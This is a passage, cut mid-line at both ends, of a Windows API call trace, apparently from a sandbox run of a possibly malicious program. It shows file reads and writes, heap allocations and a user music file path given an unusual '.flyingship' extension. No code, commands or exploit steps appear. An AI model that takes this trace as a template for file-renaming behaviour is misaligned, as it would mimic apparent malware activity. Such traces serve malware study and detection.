(in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.133] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0188.133] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.133] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0188.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0188.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0188.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0188.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0188.133] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0188.133] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x298c, lpOverlapped=0x0) returned 1 [0188.133] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0188.133] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x298c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.133] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0188.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0188.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0188.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0188.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0188.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.flyingship.wav\r\n", cchWideChar=82, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 82 [0188.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x52) returned 0x8c4a48 [0188.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.flyingship.wav\r\n", cchWideChar=82, lpMultiByteStr=0x8c4a48, cbMultiByte=82, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.flyingship.wav\r\n", lpUsedDefaultChar=0x0) returned 82 [0188.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0188.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5de0 [0188.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c4a48 | out: hHeap=0x8a0000) returned 1 [0188.134] WriteFile (in: hFile=0x160, lpBuffer=0x9a5de0*, nNumberOfBytesToWrite=0x51, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9a5de0*, lpNumberOfBytesWritten=0x87f43c*=0x51, lpOverlapped=0x0) returned 1 [0188.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5de0 | out: hHeap=0x8a0000) returned 1 [0188.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0188.134] CloseHandle (hObject=0x160) returned 1 [0188.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0188.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0188.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0188.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0188.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0188.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0188.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0188.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0188.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0188.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0188.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0188.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0188.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0188.136] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0188.136] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0188.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0188.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0188.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0188.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0188.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0188.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0188.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0188.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0188.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0188.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0188.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0188.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0188.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0188.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0188.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0188.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0188.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0188.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0188.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0188.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0188.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0188.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0188.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0188.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0188.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0188.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0188.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0188.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0188.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0188.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0188.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0188.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0188.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0188.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0188.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0188.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0188.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0188.137] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0188.137] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.138] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0188.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0188.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0188.138] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0188.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0188.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0188.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0188.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1990 [0188.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0188.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0188.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0188.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0188.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0188.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0188.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0188.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd960 [0188.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0188.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0188.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0188.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0188.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0188.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0188.139] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0188.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0188.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0188.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0188.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0188.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0188.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0188.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0188.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0188.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0188.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0188.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0188.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0188.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0188.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0188.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0188.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0188.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0188.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0188.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0188.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0188.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0188.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0188.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0188.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0188.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0188.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0188.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0188.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0188.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0188.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0188.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0188.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0188.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0188.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0188.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0188.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0188.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0188.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0188.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0188.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0188.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0188.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0188.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0188.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0188.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0188.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0188.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0188.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0188.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0188.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0188.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0188.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0188.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0188.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0188.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0188.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0188.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0188.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0188.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0188.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0188.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0188.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0188.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0188.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0188.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0188.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0188.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0188.141] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0188.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0188.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0188.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0188.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0188.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0188.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0188.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0188.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0188.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0188.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0188.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0188.142] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0188.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0188.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0188.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0188.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0188.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0188.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0188.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0188.142] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0188.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0188.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0188.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0188.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0188.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0188.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0188.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0188.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0188.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0188.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0188.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0188.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0188.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0188.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0188.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0188.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0188.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0188.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0188.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0188.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0188.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0188.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0188.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0188.143] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0188.143] HeapFree (in: 